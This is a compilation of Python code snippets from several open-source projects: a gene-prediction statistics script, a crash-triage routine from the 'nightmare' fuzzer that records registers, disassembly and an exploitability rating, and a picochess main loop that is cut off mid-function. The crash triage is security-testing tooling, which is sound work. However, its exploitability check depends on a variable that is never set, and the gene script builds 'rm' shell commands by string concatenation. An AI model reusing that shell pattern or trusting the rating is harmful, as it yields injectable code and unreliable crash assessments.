    gene_missing = arr_known[2]
    gene = arr_known[0]
    gene_opp_known = arr_known[1]
    gene_split = arr_known[3]
    gene_pred_overlap_opp = arr_pred_same[1]


            
    print ("1. No. of known gene : ",len(a_cds))
    print ("2. No. of predicted gene : ",len(p_cds))
    print ("3. No. of predicted gene overlapping  0 known gene (new gene): ",new_gene)
    print ("4. No. of predicted gene overlapping > 1 known gene (gene merge) : ",gene_merge)
    print ("5. No. of predicted gene overlaping 1 known gene : ",gene_found)
    print ("6. No. of predicted gene overlapping >= 1 known gene in opp strand : ",gene_opp)
    print ("7. No. of predicted gene overlapping  1 known gene (exact intron/exon boundaries) : ",true_pred_gene)
    print ("8. No. of predicted gene overlapping >= 1 predicted gene in opp strand : ",gene_pred_overlap_opp)
    
    print ("9. No. of known gene overlapping  0 predicted gene (gene missing): ",gene_missing)
    print ("10. No. of known gene overlapping > 1 predicted gene(gene split) : ",gene_split)
    print ("11. No. of known gene overlaping 1 predicted gene : ",gene)
    print ("12. No. of known gene overlapping >= 1 predicted gene in opp strand : ",gene_opp_known)

    
    out_file = args.output_dir + '/final_stats.txt'
    if not (os.path.exists(args.output_dir)) :
        sys.exit("Directory does not exist.")
    fout = open(out_file,'w')
    
    fout.write ("1. No. of known gene : " + str(len(a_cds)) + "\n")
    fout.write ("2. No. of predicted gene : " + str(len(p_cds)) + "\n")
    fout.write ("3. No. of predicted gene overlapping  0 known gene (new gene): " + str(new_gene) + "\n")
    fout.write ("4. No. of predicted gene overlapping > 1 known gene (gene merge) : " + str(gene_merge) + "\n")
    fout.write ("5. No. of predicted gene overlaping 1 known gene : " + str(gene_found) + "\n")
    fout.write ("6. No. of predicted gene overlapping >= 1 known gene in opp strand : " + str(gene_opp) + "\n")
    fout.write ("7. No. of predicted gene overlapping  1 known gene (exact intron/exon boundary) : " + str(true_pred_gene) + "\n")
    fout.write ("8. No. of predicted gene overlapping >= 1  predicted gene in opp strand : " + str(gene_pred_overlap_opp) + "\n")
    fout.write ("9. No. of known gene overlapping  0 predicted gene (gene missing): " + str(gene_missing) + "\n")
    fout.write ("10. No. of known gene overlapping > 1 predicted gene (gene_split): " + str(gene_split) + "\n")
    fout.write ("11. No. of known gene overlaping 1 predicted gene : " + str(gene) + "\n")
    fout.write ("12. No. of known gene overlapping >= 1 predicted gene in opp strand : " + str(gene_opp_known) + "\n")



    true_pred_file = args.output_dir + '/true_pred.txt'
    fout_true = open(true_pred_file,'w')
    for true_gene in gene_true :
        fout_true.write(true_gene+"\n")
    


    #Clean up
    delete_file = ['exon_1.bed','exon_2.bed','exon_1_merged.bed','exon_2_merged.bed','exon_1_2_intersect.bed']
    for f in delete_file :
        cmd = "rm " + args.output_dir + "/" + f
        os.system(cmd)

Example 157

Project: nightmare Source File: vtrace_iface.py
def main(args):
  crash_data_dict = None
  tr = vtrace.getTrace()
  
  global timeout
  if os.getenv("NIGHTMARE_TIMEOUT"):
    timeout = float(os.getenv("NIGHTMARE_TIMEOUT"))

  if args[0] in ["--attach", "-A"]:
    if len(args) == 1:
      usage()
      sys.exit(1)
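      # sys.exit(1) raises SystemExit; the interpreter terminates with exit status 1.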
    else:
      pid = int(args[1])
      if timeout != 0:
        # Schedule a timer to detach from the process after some seconds
        timer = threading.Timer(timeout, kill_process, (tr, False, ))
        timer.start()
      tr.attach(pid)
  else:    
    if timeout != 0:
      # Schedule a timer to kill the process after 5 seconds
      timer = threading.Timer(timeout, kill_process, (tr, True, ))
      timer.start()

    cmd = args
    if type(args) is list:
      cmd = " ".join(args)

    tr.execute(" ".join(args))
    tr.run()

  signal = tr.getCurrentSignal()
  signal_name = signal_to_name(signal)
  ignore_list = ["Unknown", "SIGUSR1", "SIGUSR2", "SIGTTIN", "SIGPIPE", "SIGINT"]
  while signal is None or signal_name in ignore_list:
    signal = tr.getCurrentSignal()
    signal_name = signal_to_name(signal)
    try:
      tr.run()
    except:
      break

  if timeout != 0:
    timer.cancel()
  # Don't do anything else, the process is gone
  if os.name != "nt" and not tr.attached:
    return None

  if signal is not None:
    print tr, hex(signal)
    print " ".join(sys.argv)
    crash_name = os.getenv("NFP_INFO_CRASH")

    # Create the object to store all the crash data
    crash_data = CCrashData(tr.getProgramCounter(), sig2name(signal))
    if crash_name is None:
      crash_name = "info.crash"
    #f = open(crash_name, "wb")

    exploitability_reason = None
    if os.name != "nt" and signal == 4:
      # Due to illegal instruction
      exploitable = EXPLOITABLE
      exploitability_reason = "Illegal instruction"
    elif os.name == "nt" and signal in [0xc0000096, 0xc000001d]:
      # Due to illegal or privileged instruction
      exploitable = EXPLOITABLE
      if signal == 0xc000001d:
        exploitability_reason = "Illegal instruction"
      else:
        exploitability_reason = "Privileged instruction"
    else:
      exploitable = NOT_EXPLOITABLE

    crash_data.add_data("process", "pid", tr.getPid())
    if os.name == "nt":
      print "Process %d crashed with exception 0x%x (%s)" % (tr.getPid(), signal, win32_exc_to_name(signal))
    else:
      print "Process %d crashed with signal %d (%s)" % (tr.getPid(), signal, signal_to_name(signal))

    i = 0
    for t in tr.getThreads():
      i += 1
      crash_data.add_data("threads", "%d" % i, t)

    stack_trace = tr.getStackTrace()
    total = len(stack_trace)
    i = 0
    for x in stack_trace:
      i += 1
      sym = tr.getSymByAddr(x[0], exact=False)
      if sym is None:
        sym = ""
      
      crash_data.add_data("stack trace", "%d" % i, [x[0], str(sym)])
      total -= 1

    regs = tr.getRegisterContext().getRegisters()
    for reg in regs:
      crash_data.add_data("registers", reg, regs[reg])
      if reg.startswith("r"):
        line = reg.ljust(5) + "%016x" % regs[reg]
        try:
          mem = tr.readMemory(regs[reg], 32)
          mem = base64.b64encode(mem)
          crash_data.add_data("registers memory", reg, mem)
          line += "\t" + repr(mem)
        except:
          pass

    for reg in COMMON_REGS:
      if reg in regs:
        if reg in crash_data.data["registers memory"]:
          print reg, hex(regs[reg]), repr(base64.b64decode(crash_data.data["registers memory"][reg]))
        else:
          print reg, hex(regs[reg])
    print

    total_around = 40
    if 'rip' in regs or 'rsp' in regs or 'rbp' in regs:
      if len("%08x" % regs['rip']) > 8 or len("%08x" % regs['rsp']) > 8 or len("%08x" % regs['rbp']) > 8:
        mode = CS_MODE_64
      else:
        mode = CS_MODE_32
    else:
      mode = CS_MODE_32
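    # Heuristic: a register value wider than 8 hex digits (i.e. >= 2**32) implies a
    # 64-bit target. (Note regs['rip'] would raise KeyError if only rsp/rbp existed,
    # since the guard above uses 'or'.)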

    md = Cs(CS_ARCH_X86, mode)
    md.skipdata = True
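    # With skipdata=True, Capstone emits '.byte' pseudo-instructions for bytes it
    # cannot decode and keeps disassembling; the '.byte' check further down relies on it.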
    pc = tr.getProgramCounter()
    crash_mnem = None
    crash_ops = None
    try:
      pc_mem = tr.readMemory(pc-total_around/2, total_around)
      offset = regs["rip"]-total_around/2

      ret = []
      found = False
      for x in md.disasm(pc_mem, 0):
        line = "%016x %s %s" % ((offset + x.address), x.mnemonic, x.op_str)
        crash_data.add_data("disassembly", offset + x.address, "%s %s" %(x.mnemonic, x.op_str))
        if offset + x.address == pc:
          crash_data.disasm = [x.address + offset, "%s %s" %(x.mnemonic, x.op_str)]
          line += "\t\t<--------- CRASH"
          print line
          found = True
        ret.append(line)

      if not found:
        offset = pc = tr.getProgramCounter()
        pc_mem = tr.readMemory(pc, total_around)
        for x in md.disasm(pc_mem, 0):
          line = "%016x %s %s" % ((offset + x.address), x.mnemonic, x.op_str)
          if offset + x.address == pc:
            line += "\t\t<--------- CRASH"
            crash_data.disasm = [x.address + offset, "%s %s" % (x.mnemonic, x.op_str)]
          print line
    except:
      # Due to invalid memory at $PC
      if signal != 6:
        exploitable = True
        exploitability_reason = "Invalid memory at program counter"
      print "Exception:", sys.exc_info()[1]

    if crash_mnem:
      if crash_mnem in ["call", "jmp"] or \
         crash_mnem.startswith("jmp") or \
         crash_mnem.startswith("call"):
        if crash_ops.find("[") > -1:
          # Due to jump/call with a register that maybe controllable
          exploitable = EXPLOITABLE
          exploitability_reason = "Jump or call with a probably controllable register"
      elif crash_mnem.startswith(".byte"):
        # Due to illegal instruction
        exploitable = MAYBE_EXPLOITABLE
        exploitability_reason = "Illegal instruction"
      elif crash_mnem.startswith("in") or \
           crash_mnem.startswith("out") or \
           crash_mnem in ["hlt", "iret", "clts", "lgdt", "lidt",
                                     "lldt", "lmsw", "ltr", "cli", "sti"]:
        if crash_mnem != "int":
          # Due to privileged instruction (which makes no sense in user-land)
          exploitable = MAYBE_EXPLOITABLE
          exploitability_reason = "Privileged instruction"

    #print >>f
    #print >>f, "Maps:"
    i = 0
    for m in tr.getMemoryMaps():
      i += 1
      line = "%016x %s %s %s" % (m[0], str(m[1]).rjust(8), get_permision_str(m[2]), m[3])
      crash_data.add_data("memory maps", "%d" % i, m)
      #print >>f, line

    #print >>f
    if exploitable > 0:
      crash_data.exploitable = is_exploitable(exploitable)
      crash_data.add_data("exploitability", "reason", exploitability_reason)
      #print >>f, "Exploitable: %s. %s." % (is_exploitable(exploitable), exploitability_reason)
    else:
      #print >>f, "Exploitable: Unknown."
      pass

    crash_data_buf = crash_data.dump_json()
    crash_data_dict = crash_data.dump_dict()
    print "Yep, we got a crash! \o/"
    print
    #print "Dumping JSON...."
    #print crash_data_buf
    #print 

  if tr.attached:
    try:
      tr.kill()
    except:
      pass
  try:
    tr.release()
  except:
    pass

  return crash_data_dict

Example 158

Project: picochess Source File: picochess.py
Function: main
def main():

    def display_system_info():
        if args.enable_internet:
            place = get_location()
            addr = get_ip()
        else:
            place = '?'
            addr = None
        DisplayMsg.show(Message.SYSTEM_INFO(info={'version': version, 'location': place, 'ip': addr,
                                                  'engine_name': engine_name, 'user_name': user_name
                                                  }))

    def compute_legal_fens(g):
        """
        Compute a list of legal FENs for the given game.
        :param g: The game
        :return: A list of legal FENs
        """
        fens = []
        for move in g.legal_moves:
            g.push(move)
            fens.append(g.board_fen())
            g.pop()
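        # push/pop leaves g unchanged: each candidate move is applied, its resulting
        # board FEN recorded, then immediately undone.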
        return fens

    def probe_tablebase(game):
        if not gaviota:
            return None
        score = gaviota.probe_dtm(game)
        if score is not None:
            Observable.fire(Event.NEW_SCORE(score='gaviota', mate=score))
        return score

    def think(game, tc):
        """
        Start a new search on the current game.
        If a move is found in the opening book, fire an event in a few seconds.
        :return:
        """
        start_clock()
        book_move = searchmoves.book(bookreader, game)
        if book_move:
            Observable.fire(Event.BEST_MOVE(result=book_move, inbook=True))
        else:
            probe_tablebase(game)
            while not engine.is_waiting():
                time.sleep(0.1)
                logging.warning('engine is still not waiting')
            engine.position(copy.deepcopy(game))
            uci_dict = tc.uci()
            uci_dict['searchmoves'] = searchmoves.all(game)
            engine.go(uci_dict)

    def analyse(game):
        """
        Start a new ponder search on the current game.
        :return:
        """
        probe_tablebase(game)
        engine.position(copy.deepcopy(game))
        engine.ponder()

    def observe(game):
        """
        Starts a new ponder search on the current game.
        :return:
        """
        start_clock()
        analyse(game)

    def stop_search_and_clock():
        if interaction_mode == Mode.NORMAL:
            stop_clock()
        elif interaction_mode in (Mode.REMOTE, Mode.OBSERVE):
            stop_clock()
            stop_search()
        elif interaction_mode in (Mode.ANALYSIS, Mode.KIBITZ, Mode.PONDER):
            stop_search()

    def stop_search():
        """
        Stop current search.
        :return:
        """
        engine.stop()

    def stop_clock():
        if interaction_mode in (Mode.NORMAL, Mode.OBSERVE, Mode.REMOTE):
            time_control.stop()
            DisplayMsg.show(Message.CLOCK_STOP())
        else:
            logging.warning('wrong mode: {}'.format(interaction_mode))

    def start_clock():
        if interaction_mode in (Mode.NORMAL, Mode.OBSERVE, Mode.REMOTE):
            time_control.start(game.turn)
            DisplayMsg.show(Message.CLOCK_START(turn=game.turn, time_control=time_control))
        else:
            logging.warning('wrong mode: {}'.format(interaction_mode))

    def check_game_state(game, play_mode):
        """
        Check if the game has ended or not; it also sends a Message to the Displays if the game has ended.
        :param game:
        :param play_mode:
        :return: True if the game continues, False if it has ended
        """
        result = None
        if game.is_stalemate():
            result = GameResult.STALEMATE
        if game.is_insufficient_material():
            result = GameResult.INSUFFICIENT_MATERIAL
        if game.is_seventyfive_moves():
            result = GameResult.SEVENTYFIVE_MOVES
        if game.is_fivefold_repetition():
            result = GameResult.FIVEFOLD_REPETITION
        if game.is_checkmate():
            result = GameResult.MATE

        if result is None:
            return True
        else:
            DisplayMsg.show(Message.GAME_ENDS(result=result, play_mode=play_mode, game=game.copy()))
            return False

    def user_move(move):
        logging.debug('user move [%s]', move)
        if move not in game.legal_moves:
            logging.warning('Illegal move [%s]', move)
        else:
            handle_move(move=move)

    def process_fen(fen):
        nonlocal last_computer_fen
        nonlocal last_legal_fens
        nonlocal searchmoves
        nonlocal legal_fens

        # Check for same position
        if (fen == game.board_fen() and not last_computer_fen) or fen == last_computer_fen:
            logging.debug('Already in this fen: ' + fen)

        # Check if we have to undo a previous move (sliding)
        elif fen in last_legal_fens:
            if interaction_mode == Mode.NORMAL:
                if (play_mode == PlayMode.USER_WHITE and game.turn == chess.BLACK) or \
                        (play_mode == PlayMode.USER_BLACK and game.turn == chess.WHITE):
                    stop_search()
                    game.pop()
                    logging.debug('User move in computer turn, reverting to: ' + game.board_fen())
                elif last_computer_fen:
                    last_computer_fen = None
                    game.pop()
                    game.pop()
                    logging.debug('User move while computer move is displayed, reverting to: ' + game.board_fen())
                else:
                    logging.error("last_legal_fens not cleared: " + game.board_fen())
            elif interaction_mode == Mode.REMOTE:
                if (play_mode == PlayMode.USER_WHITE and game.turn == chess.BLACK) or \
                        (play_mode == PlayMode.USER_BLACK and game.turn == chess.WHITE):
                    game.pop()
                    logging.debug('User move in remote turn, reverting to: ' + game.board_fen())
                elif last_computer_fen:
                    last_computer_fen = None
                    game.pop()
                    game.pop()
                    logging.debug('User move while remote move is displayed, reverting to: ' + game.board_fen())
                else:
                    logging.error('last_legal_fens not cleared: ' + game.board_fen())
            else:
                game.pop()
                logging.debug('Wrong color move -> sliding, reverting to: ' + game.board_fen())
            legal_moves = list(game.legal_moves)
            user_move(legal_moves[last_legal_fens.index(fen)])
            if interaction_mode == Mode.NORMAL or interaction_mode == Mode.REMOTE:
                legal_fens = []
            else:
                legal_fens = compute_legal_fens(game)

        # legal move
        elif fen in legal_fens:
            time_control.add_inc(game.turn)
            legal_moves = list(game.legal_moves)
            user_move(legal_moves[legal_fens.index(fen)])
            last_legal_fens = legal_fens
            if interaction_mode == Mode.NORMAL or interaction_mode == Mode.REMOTE:
                legal_fens = []
            else:
                legal_fens = compute_legal_fens(game)

        # Player had done the computer or remote move on the board
        elif last_computer_fen and fen == game.board_fen():
            last_computer_fen = None
            if check_game_state(game, play_mode) and interaction_mode in (Mode.NORMAL, Mode.REMOTE):
                # finally reset all alternative moves; see handle_move()
                nonlocal searchmoves
                searchmoves.reset()
                time_control.add_inc(not game.turn)
                if time_control.mode != TimeMode.FIXED:
                    start_clock()
                DisplayMsg.show(Message.COMPUTER_MOVE_DONE_ON_BOARD())
                legal_fens = compute_legal_fens(game)
            else:
                legal_fens = []
            last_legal_fens = []

        # Check if this is a previous legal position and allow user to restart from this position
        else:
            game_history = copy.deepcopy(game)
            if last_computer_fen:
                game_history.pop()
            while game_history.move_stack:
                game_history.pop()
                if game_history.board_fen() == fen:
                    logging.debug("Current game FEN      : {}".format(game.fen()))
                    logging.debug("Undoing game until FEN: {}".format(fen))
                    stop_search_and_clock()
                    while len(game_history.move_stack) < len(game.move_stack):
                        game.pop()
                    last_computer_fen = None
                    last_legal_fens = []
                    if (interaction_mode == Mode.REMOTE or interaction_mode == Mode.NORMAL) and \
                            ((play_mode == PlayMode.USER_WHITE and game_history.turn == chess.BLACK)
                              or (play_mode == PlayMode.USER_BLACK and game_history.turn == chess.WHITE)):
                        legal_fens = []
                        if interaction_mode == Mode.NORMAL:
                            searchmoves.reset()
                            if check_game_state(game, play_mode):
                                think(game, time_control)
                    else:
                        legal_fens = compute_legal_fens(game)

                    if interaction_mode in (Mode.ANALYSIS, Mode.KIBITZ, Mode.PONDER):
                        analyse(game)
                    elif interaction_mode in (Mode.OBSERVE, Mode.REMOTE):
                        observe(game)
                    start_clock()
                    DisplayMsg.show(Message.USER_TAKE_BACK())
                    break

    def set_wait_state(start_search=True):
        if interaction_mode == Mode.NORMAL:
            nonlocal play_mode
            play_mode = PlayMode.USER_WHITE if game.turn == chess.WHITE else PlayMode.USER_BLACK
        if start_search:
            # Go back to analysing or observing
            if interaction_mode in (Mode.ANALYSIS, Mode.KIBITZ, Mode.PONDER):
                analyse(game)
            if interaction_mode in (Mode.OBSERVE, Mode.REMOTE):
                observe(game)

    def handle_move(move, ponder=None, inbook=False):
        nonlocal game
        nonlocal last_computer_fen
        nonlocal searchmoves
        fen = game.fen()
        turn = game.turn

        # clock must be stopped BEFORE the "book_move" event because SetNRun resets the clock display
        stop_search_and_clock()

        # engine or remote move
        if (interaction_mode == Mode.NORMAL or interaction_mode == Mode.REMOTE) and \
                ((play_mode == PlayMode.USER_WHITE and game.turn == chess.BLACK) or
                     (play_mode == PlayMode.USER_BLACK and game.turn == chess.WHITE)):
            last_computer_fen = game.board_fen()
            game.push(move)
            if inbook:
                DisplayMsg.show(Message.BOOK_MOVE())
            searchmoves.add(move)
            text = Message.COMPUTER_MOVE(move=move, ponder=ponder, fen=fen, turn=turn, game=game.copy(),
                                         time_control=time_control, wait=inbook)
            DisplayMsg.show(text)
        else:
            last_computer_fen = None
            game.push(move)
            if inbook:
                DisplayMsg.show(Message.BOOK_MOVE())
            searchmoves.reset()
            if interaction_mode == Mode.NORMAL:
                if check_game_state(game, play_mode):
                    think(game, time_control)
                text = Message.USER_MOVE(move=move, fen=fen, turn=turn, game=game.copy())
            elif interaction_mode == Mode.REMOTE:
                if check_game_state(game, play_mode):
                    observe(game)
                text = Message.USER_MOVE(move=move, fen=fen, turn=turn, game=game.copy())
            elif interaction_mode == Mode.OBSERVE:
                if check_game_state(game, play_mode):
                    observe(game)
                text = Message.REVIEW_MOVE(move=move, fen=fen, turn=turn, game=game.copy(), mode=interaction_mode)
            else:  # interaction_mode in (Mode.ANALYSIS, Mode.KIBITZ):
                if check_game_state(game, play_mode):
                    analyse(game)
                text = Message.REVIEW_MOVE(move=move, fen=fen, turn=turn, game=game.copy(), mode=interaction_mode)
            DisplayMsg.show(text)

    def transfer_time(time_list):
        def num(ts):
            try:
                return int(ts)
            except ValueError:
                return 1
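        # num() falls back to 1 on non-numeric tokens, so a malformed time string
        # still yields a usable TimeControl below.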

        if len(time_list) == 1:
            secs = num(time_list[0])
            time_control = TimeControl(TimeMode.FIXED, seconds_per_move=secs)
            text = dgttranslate.text('B00_tc_fixed', '{:2d}'.format(secs))
        elif len(time_list) == 2:
            mins = num(time_list[0])
            finc = num(time_list[1])
            if finc == 0:
                time_control = TimeControl(TimeMode.BLITZ, minutes_per_game=mins)
                text = dgttranslate.text('B00_tc_blitz', '{:2d}'.format(mins))
            else:
                time_control = TimeControl(TimeMode.FISCHER, minutes_per_game=mins, fischer_increment=finc)
                text = dgttranslate.text('B00_tc_fisch', '{:2d} {:2d}'.format(mins, finc))
        else:
            time_control = TimeControl(TimeMode.BLITZ, minutes_per_game=5)
            text = dgttranslate.text('B00_tc_blitz', ' 5')
        return time_control, text

    def get_engine_level_dict(engine_level):
        from engine import get_installed_engines

        installed_engines = get_installed_engines(engine.get_shell(), engine.get_file())
        for index in range(0, len(installed_engines)):
            eng = installed_engines[index]
            if eng['file'] == engine.get_file():
                level_list = sorted(eng['level_dict'])
                try:
                    level_index = level_list.index(engine_level)
                    return eng['level_dict'][level_list[level_index]]
                except ValueError:
                    break
        return {}

    # Enable garbage collection - needed for engine swapping, as objects become orphaned
    gc.enable()

    # Command line argument parsing
    parser = configargparse.ArgParser(default_config_files=[os.path.join(os.path.dirname(__file__), 'picochess.ini')])
    parser.add_argument('-e', '--engine', type=str, help='UCI engine executable path', default=None)
    parser.add_argument('-el', '--engine-level', type=str, help='UCI engine level', default=None)
    parser.add_argument('-d', '--dgt-port', type=str,
                        help='enable dgt board on the given serial port such as /dev/ttyUSB0')
    parser.add_argument('-b', '--book', type=str, help='full path of book such as books/b-flank.bin',
                        default='h-varied.bin')
    parser.add_argument('-t', '--time', type=str, default='5 0',
                        help="Time settings <FixSec> or <StMin IncSec> like '10'(move) or '5 0'(game) '3 2'(fischer)")
    parser.add_argument('-g', '--enable-gaviota', action='store_true', help='enable gaviota tablebase probing')
    parser.add_argument('-leds', '--enable-revelation-leds', action='store_true', help='enable Revelation leds')
    parser.add_argument('-l', '--log-level', choices=['notset', 'debug', 'info', 'warning', 'error', 'critical'],
                        default='warning', help='logging level')
    parser.add_argument('-lf', '--log-file', type=str, help='log to the given file')
    parser.add_argument('-rs', '--remote-server', type=str, help='remote server running the engine')
    parser.add_argument('-ru', '--remote-user', type=str, help='remote user on server running the engine')
    parser.add_argument('-rp', '--remote-pass', type=str, help='password for the remote user')
    parser.add_argument('-rk', '--remote-key', type=str, help='key file used to connect to the remote server')
    parser.add_argument('-pf', '--pgn-file', type=str, help='pgn file used to store the games', default='games.pgn')
    parser.add_argument('-pu', '--pgn-user', type=str, help='user name for the pgn file', default=None)
    parser.add_argument('-ar', '--auto-reboot', action='store_true', help='reboot system after update')
    parser.add_argument('-web', '--web-server', dest='web_server_port', nargs='?', const=80, type=int, metavar='PORT',
                        help='launch web server')
    parser.add_argument('-m', '--email', type=str, help='email used to send pgn files', default=None)
    parser.add_argument('-ms', '--smtp-server', type=str, help='address of email server', default=None)
    parser.add_argument('-mu', '--smtp-user', type=str, help='username for email server', default=None)
    parser.add_argument('-mp', '--smtp-pass', type=str, help='password for email server', default=None)
    parser.add_argument('-me', '--smtp-encryption', action='store_true',
                        help='use ssl encryption connection to smtp-Server')
    parser.add_argument('-mf', '--smtp-from', type=str, help='From email', default='[email protected]')
    parser.add_argument('-mk', '--mailgun-key', type=str, help='key used to send emails via Mailgun Webservice',
                        default=None)
    parser.add_argument('-bc', '--beep-config', choices=['none', 'some', 'all'], help='sets standard beep config',
                        default='some')
    parser.add_argument('-beep', '--beep-level', type=int, default=0x03,
                        help='sets (some-)beep level from 0(=no beeps) to 15(=all beeps)')
    parser.add_argument('-uvoice', '--user-voice', type=str, help='voice for user', default=None)
    parser.add_argument('-cvoice', '--computer-voice', type=str, help='voice for computer', default=None)
    parser.add_argument('-inet', '--enable-internet', action='store_true', help='enable internet lookups')
    parser.add_argument('-nook', '--disable-ok-message', action='store_true', help='disable ok confirmation messages')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s version {}'.format(version),
                        help='show current version', default=None)
    parser.add_argument('-pi', '--dgtpi', action='store_true', help='use the dgtpi hardware')
    parser.add_argument('-lang', '--language', choices=['en', 'de', 'nl', 'fr', 'es'], default='en',
                        help='picochess language')
    parser.add_argument('-c', '--console', action='store_true', help='use console interface')

    args = parser.parse_args()
    if args.engine is None:
        el = read_engine_ini()
        args.engine = el[0]['file']  # read the first engine filename and use it as standard

    # Enable logging
    if args.log_file:
        handler = RotatingFileHandler('logs' + os.sep + args.log_file, maxBytes=1024*1024, backupCount=9)
        logging.basicConfig(level=getattr(logging, args.log_level.upper()),
                            format='%(asctime)s.%(msecs)03d %(levelname)5s %(module)10s - %(funcName)s: %(message)s',
                            datefmt="%Y-%m-%d %H:%M:%S", handlers=[handler])
    logging.getLogger('chess.uci').setLevel(logging.INFO)  # don't want to get so many python-chess uci messages

    logging.debug('#'*20 + ' PicoChess v' + version + ' ' + '#'*20)
    # log the startup parameters but hide the password fields
    p = copy.copy(vars(args))
    p['mailgun_key'] = p['remote_key'] = p['remote_pass'] = p['smtp_pass'] = '*****'
    logging.debug('startup parameters: {}'.format(p))

    # Update
    if args.enable_internet:
        update_picochess(args.auto_reboot)

    gaviota = None
    if args.enable_gaviota:
        try:
            gaviota = chess.gaviota.open_tablebases('tablebases/gaviota')
            logging.debug('Tablebases gaviota loaded')
        except OSError:
            logging.error("Tablebases gaviota doesn't exist")
            gaviota = None

    # The class dgtDisplay talks to DgtHw/DgtPi or DgtVr
    dgttranslate = DgtTranslate(args.beep_config, args.beep_level, args.language)
    DgtDisplay(args.disable_ok_message, dgttranslate).start()

    # Launch web server
    if args.web_server_port:
        WebServer(args.web_server_port).start()

    dgtserial = DgtSerial(args.dgt_port, args.enable_revelation_leds, args.dgtpi)

    if args.console:
        # Enable keyboard input and terminal display
        logging.debug('starting picochess in virtual mode')
        KeyboardInput(dgttranslate, args.dgtpi).start()
        TerminalDisplay().start()
        DgtVr(dgtserial, dgttranslate).start()
    else:
        # Connect to DGT board
        logging.debug('starting picochess in board mode')
        if args.dgtpi:
            DgtPi(dgtserial, dgttranslate).start()
        DgtHw(dgtserial, dgttranslate).start()
    # Save to PGN
    emailer = Emailer(
        net=args.enable_internet, email=args.email, mailgun_key=args.mailgun_key,
        smtp_server=args.smtp_server, smtp_user=args.smtp_user,
        smtp_pass=args.smtp_pass, smtp_encryption=args.smtp_encryption, smtp_from=args.smtp_from)

    PgnDisplay(args.pgn_file, emailer).start()
    if args.pgn_user:
        user_name = args.pgn_user
    else:
        if args.email:
            user_name = args.email.split('@')[0]
        else:
            user_name = 'Player'

    # Create PicoTalker for speech output
    if args.user_voice or args.computer_voice:
        from talker.picotalker import PicoTalkerDisplay
        logging.debug("initializing PicoTalker [%s, %s]", str(args.user_voice), str(args.computer_voice))
        PicoTalkerDisplay(args.user_voice, args.computer_voice).start()
    else:
        logging.debug('PicoTalker disabled')

    # Gentlemen, start your engines...
    engine = UciEngine(args.engine, hostname=args.remote_server, username=args.remote_user,
                       key_file=args.remote_key, password=args.remote_pass)
    try:
        engine_name = engine.get().name
    except AttributeError:
        logging.error('no engines started')
        sys.exit(-1)
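        # sys.exit(-1) raises SystemExit; on POSIX the reported exit status is 255,
        # since the value is truncated to 8 bits (-1 & 0xFF).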

    # Startup - internal
    game = chess.Board()  # Create the current game
    legal_fens = compute_legal_fens(game)  # Compute the legal FENs
    all_books = get_opening_books()
    try:
        book_index = [book['file'] for book in all_books].index(args.book)
    except ValueError:
        logging.warning("selected book not present, defaulting to %s", all_books[7]['file'])
        book_index = 7
    bookreader = chess.polyglot.open_reader(all_books[book_index]['file'])
    searchmoves = AlternativeMover()
    interaction_mode = Mode.NORMAL
    play_mode = PlayMode.USER_WHITE

    last_computer_fen = None
    last_legal_fens = []
    game_declared = False  # User declared resignation or draw

    engine.startup(get_engine_level_dict(args.engine_level))

    # Startup - external
    time_control, time_text = transfer_time(args.time.split())
    time_text.beep = False
    if args.engine_level:
        level_text = dgttranslate.text('B00_level', args.engine_level)
        level_text.beep = False
    else:
        level_text = None
    DisplayMsg.show(Message.STARTUP_INFO(info={'interaction_mode': interaction_mode, 'play_mode': play_mode,
                                               'books': all_books, 'book_index': book_index, 'level_text': level_text,
                                               'time_control': time_control, 'time_text': time_text}))
    DisplayMsg.show(Message.ENGINE_STARTUP(shell=engine.get_shell(), file=engine.get_file(),
                                           has_levels=engine.has_levels(), has_960=engine.has_chess960()))

    system_info_thread = threading.Timer(0, display_system_info)
    system_info_thread.start()
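    # threading.Timer(0, fn) runs fn once on its own thread almost immediately, so
    # the potentially slow get_location()/get_ip() lookups don't block startup.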

    # Event loop
    logging.info('evt_queue ready')
    while True:
        try:
            event = evt_queue.get()
        except queue.Empty:
            pass
        else:
            logging.debug('received event from evt_queue: %s', event)
            for case in switch(event):
                if case(EventApi.FEN):
                    process_fen(event.fen)
                    break

                if case(EventApi.KEYBOARD_MOVE):
                    move = event.move
                    logging.debug('keyboard move [%s]', move)
                    if move not in game.legal_moves:
                        logging.warning('illegal move [%s]', move)
                    else:
                        g = copy.deepcopy(game)
                        g.push(move)
                        fen = g.fen().split(' ')[0]
                        if event.flip_board:
                            fen = fen[::-1]
                        DisplayMsg.show(Message.KEYBOARD_MOVE(fen=fen))
                    break

                if case(EventApi.LEVEL):
                    if event.options:
                        engine.startup(event.options, False)
                    DisplayMsg.show(Message.LEVEL(level_text=event.level_text))
                    break

                if case(EventApi.NEW_ENGINE):
                    config = ConfigObj('picochess.ini')
                    config['engine'] = event.eng['file']
                    config.write()
                    old_file = engine.get_file()
                    engine_shutdown = True
                    # Stop the old engine cleanly
                    engine.stop()
                    # Closeout the engine process and threads
                    # They all return non-zero error codes, 0=success
                    if engine.quit():  # Ask nicely
                        if engine.terminate():  # If you won't go nicely.... 
                            if engine.kill():  # Right that does it!
                                logging.error('engine shutdown failure')
                                DisplayMsg.show(Message.ENGINE_FAIL())
                                engine_shutdown = False
                    if engine_shutdown:
                        # Load the new one and send args.
                        # Local engines only
                        engine_fallback = False
                        engine = UciEngine(event.eng['file'])
                        try:
                            engine_name = engine.get().name
                        except AttributeError:
                            # New engine failed to start, restart old engine
                            logging.error("new engine failed to start, reverting to %s", old_file)
                            engine_fallback = True
                            event.options = {}  # Reset options. This will load the last(=strongest?) level
                            engine = UciEngine(old_file)
                            try:
                                engine_name = engine.get().name
                            except AttributeError:
                                # Help - old engine failed to restart. There is no engine
                                logging.error('no engines started')
                                sys.exit(-1)
                        # Schedule cleanup of old objects
                        gc.collect()
                        engine.startup(event.options)
                        # All done - rock'n'roll
                        if not engine_fallback:
                            DisplayMsg.show(Message.ENGINE_READY(eng=event.eng, engine_name=engine_name,
                                                                 eng_text=event.eng_text,
                                                                 has_levels=engine.has_levels(),
                                                                 has_960=engine.has_chess960(), ok_text=event.ok_text))
                        else:
                            DisplayMsg.show(Message.ENGINE_FAIL())
                        set_wait_state(not engine_fallback)
                    break

                if case(EventApi.SETUP_POSITION):
                    logging.debug("setting up custom fen: {}".format(event.fen))
                    uci960 = event.uci960

                    if game.move_stack:
                        if not (game.is_game_over() or game_declared):
                            DisplayMsg.show(Message.GAME_ENDS(result=GameResult.ABORT, play_mode=play_mode, game=game.copy()))
